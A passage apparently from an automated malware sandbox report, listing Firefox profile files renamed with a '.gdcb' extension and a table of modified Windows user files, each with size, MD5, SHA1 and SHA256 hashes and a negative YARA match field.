c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\blocklist-plugins.json.gdcb 197.20 KB (201936 bytes) MD5: 3c4ba43c591d9a995a4e14849e15213f
SHA1: d62a36592e1c94125f35ea92ba1c5a0ba8958e0f
SHA256: aae79e221d6bc7dd501e061dd79541549be7165c14a27ae96319c9a1f267ef86 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\blocklist.xml.gdcb 252.42 KB (258480 bytes) MD5: b42b628d5dca2a4c49434b6a03522809
SHA1: cbd0f640b7f5804c895cf543ed8ffe41f9c0fa0c
SHA256: e14c1f0a75916f47f02d9f55f8107cb2c831bf6db11efa35bf69d1429744427d 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\cert8.db.gdcb 96.52 KB (98832 bytes) MD5: 613a30081b1b9ada852e29802a034ed2
SHA1: c1558a6fd950db3d38afb6e700a4ab3caa7c1f70
SHA256: f54950d4b656f6c0b8846bb7047a674992f36cfb74feaffcbd9358861e440642 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\compatibility.ini.gdcb 0.72 KB (736 bytes) MD5: 2a3c3b66601c50e814b219717edf86aa
SHA1: f8b0868bb023bba1f9abaaa64f7dcbeeff6a7a7b
SHA256: 6272ad9b4882b06d8a5a652ea5abd52fe3fbc4e799a030a262cc65906cf10ba9 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\containers.json.gdcb 1.31 KB (1344 bytes) MD5: b47b6db7d02994ee9f6bf90c1d2e3f5a
SHA1: 278c9a3ffda0cde9caa393614b2d4dbf16a789eb
SHA256: ddc48214681a881253769f711fe50152ac977857e330e209e150e69bc467a4a6 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\content-prefs.sqlite.gdcb 224.52 KB (229904 bytes) MD5: f35e400158ea44277e5a8bb7c1a485fd
SHA1: eb3e164e64150a19f969534a0e2b1bf95ea0b6ea
SHA256: 693709460fbc64459a073c75b7884154e8d8ad3167bc9cb72862a20421a3820e 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\cookies.sqlite.gdcb 512.52 KB (524816 bytes) MD5: 4864d87fd4fafa8706618691582d50eb
SHA1: b7fab54eafe8660767e4a2dcc11ad89c10acb231
SHA256: 37aaf1db4f046763e91f881840cdca0454bb317906fa2394a42cdae2d07f233c 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\session-state.json.gdcb 0.66 KB (672 bytes) MD5: 7c081fc791cf3be85b4e2dafe3aab389
SHA1: 383de7459c1c35baf6beb7e7e6e4f165185a4395
SHA256: dff105a193540e215cdafbc559d7cec184f9f50d942ada29dcf763bb51d00597 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\state.json.gdcb 0.58 KB (592 bytes) MD5: de383ebb4d7ac5e53d6a9e1ef7e7429a
SHA1: b29ac0b83eb704bba13d503577684c047d506bac
SHA256: fa423e9f4c4ad6755daad03d9927de43db5f2a62376834db23f4fdef0a26ad4e 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\extensions.ini.gdcb 0.70 KB (720 bytes) MD5: 1158e7c90296ec9bf67c228d6f3c82f3
SHA1: 1655556dbcc057caaf173dbdf8b7aa8759b86cad
SHA256: c676704ab822a77ae4638152c45d22798310b7591864f62771d0a344103fd9c8 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\extensions.json.gdcb 6.31 KB (6464 bytes) MD5: 4a11ded0abd05200164f479de2f050b0
SHA1: 8978fc01f9c0d629b201bca3560ece8546e2a9da
SHA256: aa8ba1f603ffe755fc757dd6e1b16eb10a1ccfdaffb159dfc3c51ff8f4814315 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\formhistory.sqlite.gdcb 192.52 KB (197136 bytes) MD5: 0b72679469ad78247f075472f7d44d45
SHA1: f5fb3a92b9593a2129221d2e869d0b0292de1ddd
SHA256: ac4a10e90c1be5404f34a37edbdf08924a72967e116c947504a0f0c510034eb5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp-gmpopenh264\1.6\gmpopenh264.info.gdcb 0.64 KB (656 bytes) MD5: fe0449f06ab00664525baf7d99f7098f
SHA1: e4fce1eb219d8d304812b53bd1427490097907ea
SHA256: ae444fe438ee798026241438896f04a859b3e3a129842725a03e29675c407108 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\license.txt.gdcb 0.98 KB (1008 bytes) MD5: 3348a379c9cc128bf216fa79ff4859f7
SHA1: 69e7fd956893ce2990e1ddea955023280f711a97
SHA256: deb183b3ea1f5d8c4b6e3eadee0478c70fba58d3c4df8d66d1db25a6e76a1d39 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\manifest.json.gdcb 0.86 KB (880 bytes) MD5: ff04887dc37b6731a048ece8ff32fb8f
SHA1: 98d538e377c2f5c20ad739a72bc5f18c7b261d68
SHA256: 6f92acd43145cc497ca677d6cd183e5d99b06abf534dbad3ba12c797c96b4d68 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\key3.db.gdcb 16.52 KB (16912 bytes) MD5: 19198bf743d858949597941a7667772d
SHA1: 6c753754225579ccf0964dad36af8dd673a729bc
SHA256: 1d72a7021ec432f1fb582d0c23b0a650c95dbc89b37623af7d333a2f39c26e11 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\kinto.sqlite.gdcb 1.00 MB (1049104 bytes) MD5: 6cef10510eb4d85cc1a32afa2c95b78c
SHA1: e9a2e3141c16a4e114f078e88add801d9161f76d
SHA256: 6da159242cbbe8e6802e87c144afaee3b935142d8e9d3ad3ec15b16ff8c3a92f 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\permissions.sqlite.gdcb 96.52 KB (98832 bytes) MD5: 5dd5df4019efab4438f5c144f24728b9
SHA1: 61cedf727326bc6baf97f26a7ff7fc0dbd1b5186
SHA256: 4c3b4f13857f461d004c53d1f42019c9571e5321e86954d066885a88f7494cca 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\places.sqlite.gdcb 10.00 MB (10485760 bytes) MD5: 3ab16d235b46fffed29dda7fe31787a0
SHA1: 1ba8034558d85940390c10caa7b2ab09dcada2f5
SHA256: 8b95953b69d7ff6000349477f52fd40a2cb515d08e8620adac189ebc7b58cb3e 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\pluginreg.dat.gdcb 1.08 KB (1104 bytes) MD5: 162a464f975f993c02ff5de49fe6a2b4
SHA1: ecae0a478653ef771a197e00452ac03a2c9ebf12
SHA256: f2881afc2955788c621332c75bb71ad9fc506ef5787b23a15043e1e7842d97e0 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\prefs.js.gdcb 11.72 KB (12000 bytes) MD5: 839d9a66603b13b7100d7fd075ecde59
SHA1: 81a0774f64a853bda4f96cb42d9d1d5192faa475
SHA256: b29027e15fe4483662d5ac2afcfd6dc1d15b16290b74efed77144ef0e7b699b2 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\revocations.txt.gdcb 21.44 KB (21952 bytes) MD5: 45b97e176b42c7ae086b7b03029accd1
SHA1: 79856813a976809b7a141665745bc723fbf3af07
SHA256: 19167bd47a5e3b0b3e7164a05ff42024a1eedaa6db483303c62b918941a85bf8 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\secmod.db.gdcb 16.52 KB (16912 bytes) MD5: 2001bfd869409aea96b4cf4e1f65ee67
SHA1: 0ef3e6633d416d4d6b2ed46c12c7e59313936fc5
SHA256: b44ab5c2c2912d3a68c285fb0b4ba224ba2e9ce6d471872d0f6a17c10a584220 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\sessioncheckpoints.json.gdcb 0.80 KB (816 bytes) MD5: 3c427b245983dca52645773e536fc82b
SHA1: f1fc2a755f082783eab12953878c7af32bc8bead
SHA256: 78b76d62144692eeba9190289494dbc3f421089d423f36b91cd32dc1caf2ea4d 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\sessionstore-backups\previous.js.gdcb 167.84 KB (171872 bytes) MD5: a65d3e11898c7c575d3dccdd364a7486
SHA1: cb31ffbb450e8129fbe6ebda11e5e793a66ed43c
SHA256: 3ded70e20fab2e198fe845d80a133036f3bb13bccc85c8ba555520dcd31cc4f6 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\sessionstore.js.gdcb 1.48 KB (1520 bytes) MD5: 5e613b2b8b410f7e91a31cde38585305
SHA1: b880d6ec174e9bc8699aa22cf067311e89a2f0f8
SHA256: 53d04e36c7fc49fe215fe947f98bfaf398b2f101046b53f2fe43575f3ff5a4df 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\sitesecurityservicestate.txt.gdcb 2.41 KB (2464 bytes) MD5: 041f6ac7e85658c83cb4d1d92a8b22aa
SHA1: 3c120c5f836e81287a81d560e4ccb64e95d6b00b
SHA256: 9fca5af3190c6763539910f1a10020c260a45795c3da6f92225bddf177efaa98 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite.gdcb 48.52 KB (49680 bytes) MD5: 68f90dc52361ba8b54c5692208616a49
SHA1: 22efbf16fe06abb5007b6b7d9d792af433373336
SHA256: a2549c70334b67550eea1a49316375293f1d4f536071bd072783c2b24715545a 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite.gdcb 48.52 KB (49680 bytes) MD5: 9fd26e3c40ca850bf1d4437feeb3bd3d
SHA1: 2a983860a398b83a0bceda217b22d27d4c4fa600
SHA256: c54caf1b4643adc5658dadcc45d57de9a9c43e05e3ba5843c91142aa541ecf77 		False
Modified Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-1462094071-1423818996-289466292-1000\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b 2.15 KB (2205 bytes) MD5: 42b65bfc7929e993fcfa2434fa721ccc
SHA1: 0f4f4d8477498cec0971d0afb99aa797987f2a40
SHA256: bac3a0b62acede354bf187ea9763cd7983e6984a6a82fcb62c1a31e37db6b7d6 		False
c:\recovery\windowsre\reagent.xml 1.55 KB (1584 bytes) MD5: b54a23c3a7b39a79fac497dc373bbd78
SHA1: a436612cd0a6b71203adee2ec4c54e57100198ca
SHA256: e49227c9eca563bc13f73bbd8c27231be8720a3793531e14547944851886513d 		False
c:\users\ciihmnxmn6ps\appdata\roaming\004-sn-0z5c.wav 55.23 KB (56560 bytes) MD5: 0f1459dde60a316ff823e5d139c35369
SHA1: 771bd564cb340ab471a52d5bdd9cabca2cca3be1
SHA256: 9f8bfa505d1427cf2580717fb15df2e836367faa754bff27b2c967989d6f8985 		False
c:\users\ciihmnxmn6ps\appdata\roaming\1wmqlmoja01-ep.gif 4.50 KB (4608 bytes) MD5: c985de94f816b08c703d1e8d93f38deb
SHA1: 0ee384ce272d390e882f951f253fd9d2fe0c810f
SHA256: 0f4865b1175da7e03fdb6f4987e1f68cdcef4b67e8f60fb8e30b3deea9963810 		False
c:\users\ciihmnxmn6ps\appdata\roaming\4sctkxf.ots 6.27 KB (6416 bytes) MD5: abff62fdf29c0c95ac6844262ab0d021
SHA1: ac7e41be580eab8ddaedc3088ac224da241df886
SHA256: 729c5213b77c8ca608f8029cc8b342ac3c7de3ca614d851e43ed86f987f89545 		False
c:\users\ciihmnxmn6ps\appdata\roaming\6ttfnwvzd3wr1.wav 95.70 KB (98000 bytes) MD5: 73cf5cc0544c3516cf1336480a2916a5
SHA1: ac4277e0ac06f1c5bdb8b71ad3d34c3f287dddf5
SHA256: 0c3ba80c00a2f1b7df032bd62d17281a5597a3a5414325feeba810e16618bff6 		False
c:\users\ciihmnxmn6ps\appdata\roaming\8mu6pxfxklxwxfc.m4a 29.05 KB (29744 bytes) MD5: ee9242e408267dfad7b630abd510826f
SHA1: 735a08f05a58a7dc91196e380cfa32270ad1384e
SHA256: 3337830f27794128aae98c9549e4423d880f86358ea4684f0fb6f284350871f8 		False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\logtransport2\logs\ulog_acroarm2_reader_c8be971a-de95-4557-abcb-db98e0788e08_00209595-b6ba-4fa7-88b0-97083d4c2159_0.log 1.89 KB (1936 bytes) MD5: e9a8880e462c8674dace0cb09394f7c1
SHA1: 0b7883ceaf8b1b241054c889cd4ac4fa6090d54d
SHA256: bdeb8a73af6dbb1f3916252969669a1a5eb79c1536cd215770d6954ca563ed2e 		False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\logtransport2\logs\ulog_acroarm2_reader_c8be971a-de95-4557-abcb-db98e0788e08_56653bcd-022e-4023-b1f6-9926fada0024_0.log 1.70 KB (1744 bytes) MD5: 49e7890b98e4442c515ccc9b49868c23
SHA1: 7345966c786336a8958b252471e50f15c02deb49
SHA256: 1214c9d673d0ddf85d399eebcfb9e253b3b9cab58d8b4633c19883d36e808a12 		False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\logtransport2\logtransport2.cfg 0.73 KB (752 bytes) MD5: d8cdf288e13aadb2ce14a68a669f630a
SHA1: af0df73951537463b1487d42a99e27d7300262cd
SHA256: 31e88e523d65f182fb89bb2a06530a1e5403047db3e4fff4320a3a30832aaf5b 		False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\sonar\sonar1.0\sonar_policy.xml 18.84 KB (19296 bytes) MD5: 0c27e5c8b0aa653b07acefc50652d175
SHA1: d217de833b350ab50ba97c238cbcc18704859f29
SHA256: e0674cc38b38e8e3d90037c5708061d4af4e9ec1f5a637d1cdaf8d042fe172c6 		False
c:\users\ciihmnxmn6ps\appdata\roaming\cztjlrmt.bmp 86.44 KB (88512 bytes) MD5: 18e9c822299394be54340564c9495fb9
SHA1: 8bc8db3d2e1665627517a438f14b10d456189d71
SHA256: 89962cf39be2b75f7426d6587173960e24133af7634ee946681f7809d5ce980b 		False
c:\users\ciihmnxmn6ps\appdata\roaming\exocxblrlmurhv.gif 75.52 KB (77328 bytes) MD5: 4fd8b71eb547e80a511dea90be2d937e
SHA1: 513a365e82651b25951bc673a31a92c69cbb149f
SHA256: 41a0166c378b2e435300c9445ad20385da33592f6aae8b4f083de3118104a9ad 		False
c:\users\ciihmnxmn6ps\appdata\roaming\fcmh0q4.bmp 41.33 KB (42320 bytes) MD5: 33fdf31ed083a84ce2717ffb862ae2e0
SHA1: 8c8812203e8f54e2bcd491ce29ccdfb8ff0efbb7
SHA256: b43655c0d7d972ee2bf316f757c05f9acd99809c4d730bc6ed99ddb92f77f871 		False
c:\users\ciihmnxmn6ps\appdata\roaming\imbmboer.ppt 15.38 KB (15744 bytes) MD5: 0ddfd813a62431944e9b86bc00b0c1e3
SHA1: 56e9635f12557abb4b74e6765c41a97aee797d94
SHA256: 5e2349f3cfc00d0623f1168d723ea63d9e371b6ae4496bd2c88f930b19526e08 		False
c:\users\ciihmnxmn6ps\appdata\roaming\ixwxy.png 36.11 KB (36976 bytes) MD5: f84242aad257414c6299394eaef94f9c
SHA1: 87b0ce6ba99aab6f95d4e42a442ec6091a1f3287
SHA256: 848fb7439563b074c3cafd736a079171778af3d77dc4ec1dd37c2e308ad62da8 		False
c:\users\ciihmnxmn6ps\appdata\roaming\jxoh-eft2nw-t9x.wav 26.38 KB (27008 bytes) MD5: b5415449808e3c6932f4f94d1761bb37
SHA1: a0158afe4f3177fb8c838b46da76c89a637f17b6
SHA256: 2a12c5c57bddc771133012588410bd27b00e5c5aa4f38e08d77805b17b9be816 		False
c:\users\ciihmnxmn6ps\appdata\roaming\ldeazaydq h9.jpg 67.34 KB (68960 bytes) MD5: 1a47edbd8f8d1889567df663c75e238f
SHA1: 80a1751c44bf254cdc45a879f337048120065548
SHA256: db8c32bdd3d523dd3327bc56d93e63a74f7be65c3f926cc96b9d18e33832e6ff 		False
c:\users\ciihmnxmn6ps\appdata\roaming\lsi0fbp1d3.flv 55.88 KB (57216 bytes) MD5: 939b6ecc6f0aa446c5299714281818cf
SHA1: 40b02c8e732ea82fd2055347bb2510eb73049ebe
SHA256: 32791fd4f7b088308114afd699eb68b8a2adbbae87390a71d3729fa503202ebb 		False
c:\users\ciihmnxmn6ps\appdata\roaming\lxrxkbm2nnswbbwwbk42.mp4 96.56 KB (98880 bytes) MD5: 332b91fdf7f7aeba767b44d868a765b9
SHA1: 1e186a019d9f1206dcc31664ccf280f05673e55c
SHA256: 0b92c0b6c77f30eab7f9ad126587ad43ae31dcd64cf5de5792cdf783991bfa62 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\document building blocks\1033\16\built-in building blocks.dotx 3.53 MB (3706592 bytes) MD5: 8e8c7452e491075de50f5e9a84a2905f
SHA1: 6a56eafd259c03d9038640e65c04e06c777a6918
SHA256: 98f04c9c24889b943e54bed16be1c26ac46df40e5618e9b8fe57af8b441dd8ab 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\office\recent\index.dat 0.58 KB (592 bytes) MD5: 17dad9f4045de6bceb1598659d4c8c5a
SHA1: f1116dc673d7f32d1d5e727f08c18e3be3a9e6be
SHA256: 5e325548acad4849cc825bb073774b29004488bce2942e5f47d36b0d071d9bb2 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\onenote\16.0\preferences.dat 5.58 KB (5712 bytes) MD5: 60933f9f1dd6608884f46526bfcc62f2
SHA1: d60250ead57dd4dd0d711191546713fe55a6e40d
SHA256: 9ecc1aa70a74f8f3fb3a94b4e4529d55b4d9bb5701058c2dbf9e6f9f373afa7e 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\outlook\outlook.srs 3.02 KB (3088 bytes) MD5: 4f1121df7817b939d28f8853a82910b9
SHA1: 9c7c9b74a28b541ab43a08797d5a7ce1b19238a5
SHA256: 380a1f0a103ed3ded033a0759cd64e3007792e094f58ee01e6f46cfcf1d16624 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\outlook\outlook.xml 2.86 KB (2928 bytes) MD5: 96d99e275adaad30e6e1d1c79a424e8d
SHA1: 223ff832d6bd7ef200da2fc1669a2e2770355f63
SHA256: b08df0b6489862834b419808312bb6b5b06bdca4604344a9a201a629d882550c 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\calendar insights.xltm 893.38 KB (914816 bytes) MD5: 9ace8d3f5804bec2bf33322bbd7634f2
SHA1: a5f7bdbae0f3bbfc5f8005b13c6bd38fb22bc3c8
SHA256: 9a745102c9d7ffa9789062f6a95a6c62ac685971c15c072a0afce0c355cb6cca 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\cashflow analysis.xltm 371.62 KB (380544 bytes) MD5: f4f0fae8060d4b08ae97df8fbcbc778a
SHA1: 4bbbf4874ac53fd766f33e21a89112c9a312d646
SHA256: fce588c4aa8dad0103095bec57de759262ad9375eec73cdb1d4f59fcc392663c 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\email insights.xltm 721.30 KB (738608 bytes) MD5: 8d95a48beceba8f02826bc19d41d757b
SHA1: 25ed003799a398df182d45e21bbce9581e5ffbd1
SHA256: dbe9e6b516890cc3fff90caabf3406974ba8ca0bdef492a7138b354860e4fae7 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\normal.dotm 19.12 KB (19584 bytes) MD5: a1f1d47ce549e3030af0fc7ebbf1ddf4
SHA1: d2eef073cfe342424dc5037aaf80a9053d856c48
SHA256: 69560b53a62f017be4dadda81b79f7dba384f6490bb5d89ac254025c73babf0e 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\process map for basic flowchart.xltx 107.89 KB (110480 bytes) MD5: 4125923df0d5c4f8c5f8fbe6d953f890
SHA1: 9b1d3550bf89fc2d0a150f65b08e60d23bf7d68f
SHA256: 845e7fae5297ef9160843a26088ade29b34791d1519c009e5c138b9d09550015 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\process map for cross-functional flowchart.xltx 141.86 KB (145264 bytes) MD5: 06be6a0f948f33e4925148ac17e57a7a
SHA1: 401063e54ac2fca064d0d62d5508936da4353ce6
SHA256: 467b8d5fb7efee0fee5eb90b0b376d01b47ce3449f0806bd23258b9d4b4040a7 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\stock symbols comparison.xltm 1.39 MB (1459616 bytes) MD5: 47157eb06e51d5598d4e50d3ffdce68c
SHA1: 754bae77c4fbde31bbf4f9cd7f01522a923a1b10
SHA256: 000bf1b2ffae653fc0165337f881adb2bf84dce78848b89740d892e5c62e5075 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\welcome to excel.xltx 483.67 KB (495280 bytes) MD5: e855d4238bfb403c0e8a9a8ce692374d
SHA1: 6ec7ee5763c5da5388cc640811d7719cb3d74c66
SHA256: 7bb0213fbe8377d4a2ad86fb472f7348c3327bead9afd7b7c7a103d2317f2709 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\windows\themes\cachedfiles\cachedimage_1440_900_pos4.jpg 74.16 KB (75936 bytes) MD5: 928f5eddd1ad2f0d337d43e0255ac530
SHA1: 34f5af6657e94adf4abb54bdc7033d7498ba1020
SHA256: c7e3a962018b3fe78fd6992cba2e16db651ffad02d178b1aa453cda36c94100f 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mj7j-r46l5.pptx 46.75 KB (47872 bytes) MD5: 1a5c5b11fb72d3f1a229d3502ee42617
SHA1: 55494dbf28e2c893ddbf05315376a48e9042cc8b
SHA256: e98a3429769c1c5e7c25bdfe73bf05b48de0ded074257393d762a5b6d0555b8a 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mldkkprkrb.mkv 23.20 KB (23760 bytes) MD5: 5d41e1436cb152465ca01f00ef2e86ba
SHA1: d57943b008b3cdccec058f84199cfd83da2959d5
SHA256: 803550b48b231e0d3a8857c12e93eb9adba2dcdd59dd1388ceaaa52850da90f3 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mmsanu.wav 71.81 KB (73536 bytes) MD5: 2a49933dba48b24d252de021e4413c12
SHA1: 63a856991bfd691bff8ee577668c09504ad4f460
SHA256: 67dd7bf30a073152cd6c49d9576c0e61ad49ee2c6cc73e098f9d45814786a201 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\addons.json 0.55 KB (560 bytes) MD5: 63368ee730c3a277e09a80617cbd5e38
SHA1: f94ad6ebc41a5518eeb48b683896ca132753a07b
SHA256: 9d9b1f87ce8404f1c281d58a3e4f48c97c5f53e197c9dcf91a07095e86bffefd 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\blocklist-addons.json 450.03 KB (460832 bytes) MD5: 95e6ddee73cb0be4cacbdf0c5e64c3bf
SHA1: a610ac512fbd42c8bf0c937353c73126d7cfc86b
SHA256: 0a9c87662454702d945325d4cd48ca883193dc964cbe3774f4e2cb5805d68405 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\blocklist-gfx.json 27.83 KB (28496 bytes) MD5: 18c18310a1a4b578b24ab7ee03225b37
SHA1: 67bc366aef9829e1d1a6874733fce749848d2db2
SHA256: 963b33dbe8ac26086924d94d1d02b72b5e84247b365c152de45855aebab3cf86 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\blocklist-plugins.json 197.20 KB (201936 bytes) MD5: 3c4ba43c591d9a995a4e14849e15213f
SHA1: d62a36592e1c94125f35ea92ba1c5a0ba8958e0f
SHA256: aae79e221d6bc7dd501e061dd79541549be7165c14a27ae96319c9a1f267ef86 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\blocklist.xml 252.42 KB (258480 bytes) MD5: b42b628d5dca2a4c49434b6a03522809
SHA1: cbd0f640b7f5804c895cf543ed8ffe41f9c0fa0c
SHA256: e14c1f0a75916f47f02d9f55f8107cb2c831bf6db11efa35bf69d1429744427d 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\cert8.db 96.52 KB (98832 bytes) MD5: 613a30081b1b9ada852e29802a034ed2
SHA1: c1558a6fd950db3d38afb6e700a4ab3caa7c1f70
SHA256: f54950d4b656f6c0b8846bb7047a674992f36cfb74feaffcbd9358861e440642 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\compatibility.ini 0.72 KB (736 bytes) MD5: 2a3c3b66601c50e814b219717edf86aa
SHA1: f8b0868bb023bba1f9abaaa64f7dcbeeff6a7a7b
SHA256: 6272ad9b4882b06d8a5a652ea5abd52fe3fbc4e799a030a262cc65906cf10ba9 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\containers.json 1.31 KB (1344 bytes) MD5: b47b6db7d02994ee9f6bf90c1d2e3f5a
SHA1: 278c9a3ffda0cde9caa393614b2d4dbf16a789eb
SHA256: ddc48214681a881253769f711fe50152ac977857e330e209e150e69bc467a4a6 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\content-prefs.sqlite 224.52 KB (229904 bytes) MD5: f35e400158ea44277e5a8bb7c1a485fd
SHA1: eb3e164e64150a19f969534a0e2b1bf95ea0b6ea
SHA256: 693709460fbc64459a073c75b7884154e8d8ad3167bc9cb72862a20421a3820e 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\cookies.sqlite 512.52 KB (524816 bytes) MD5: 4864d87fd4fafa8706618691582d50eb
SHA1: b7fab54eafe8660767e4a2dcc11ad89c10acb231
SHA256: 37aaf1db4f046763e91f881840cdca0454bb317906fa2394a42cdae2d07f233c 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\session-state.json 0.66 KB (672 bytes) MD5: 7c081fc791cf3be85b4e2dafe3aab389
SHA1: 383de7459c1c35baf6beb7e7e6e4f165185a4395
SHA256: dff105a193540e215cdafbc559d7cec184f9f50d942ada29dcf763bb51d00597 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\state.json 0.58 KB (592 bytes) MD5: de383ebb4d7ac5e53d6a9e1ef7e7429a
SHA1: b29ac0b83eb704bba13d503577684c047d506bac
SHA256: fa423e9f4c4ad6755daad03d9927de43db5f2a62376834db23f4fdef0a26ad4e 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\extensions.ini 0.70 KB (720 bytes) MD5: 1158e7c90296ec9bf67c228d6f3c82f3
SHA1: 1655556dbcc057caaf173dbdf8b7aa8759b86cad
SHA256: c676704ab822a77ae4638152c45d22798310b7591864f62771d0a344103fd9c8 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\extensions.json 6.31 KB (6464 bytes) MD5: 4a11ded0abd05200164f479de2f050b0
SHA1: 8978fc01f9c0d629b201bca3560ece8546e2a9da
SHA256: aa8ba1f603ffe755fc757dd6e1b16eb10a1ccfdaffb159dfc3c51ff8f4814315 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\formhistory.sqlite 192.52 KB (197136 bytes) MD5: 0b72679469ad78247f075472f7d44d45
SHA1: f5fb3a92b9593a2129221d2e869d0b0292de1ddd
SHA256: ac4a10e90c1be5404f34a37edbdf08924a72967e116c947504a0f0c510034eb5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp-gmpopenh264\1.6\gmpopenh264.info 0.64 KB (656 bytes) MD5: fe0449f06ab00664525baf7d99f7098f
SHA1: e4fce1eb219d8d304812b53bd1427490097907ea
SHA256: ae444fe438ee798026241438896f04a859b3e3a129842725a03e29675c407108 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\license.txt 0.98 KB (1008 bytes) MD5: 3348a379c9cc128bf216fa79ff4859f7
SHA1: 69e7fd956893ce2990e1ddea955023280f711a97
SHA256: deb183b3ea1f5d8c4b6e3eadee0478c70fba58d3c4df8d66d1db25a6e76a1d39 		False
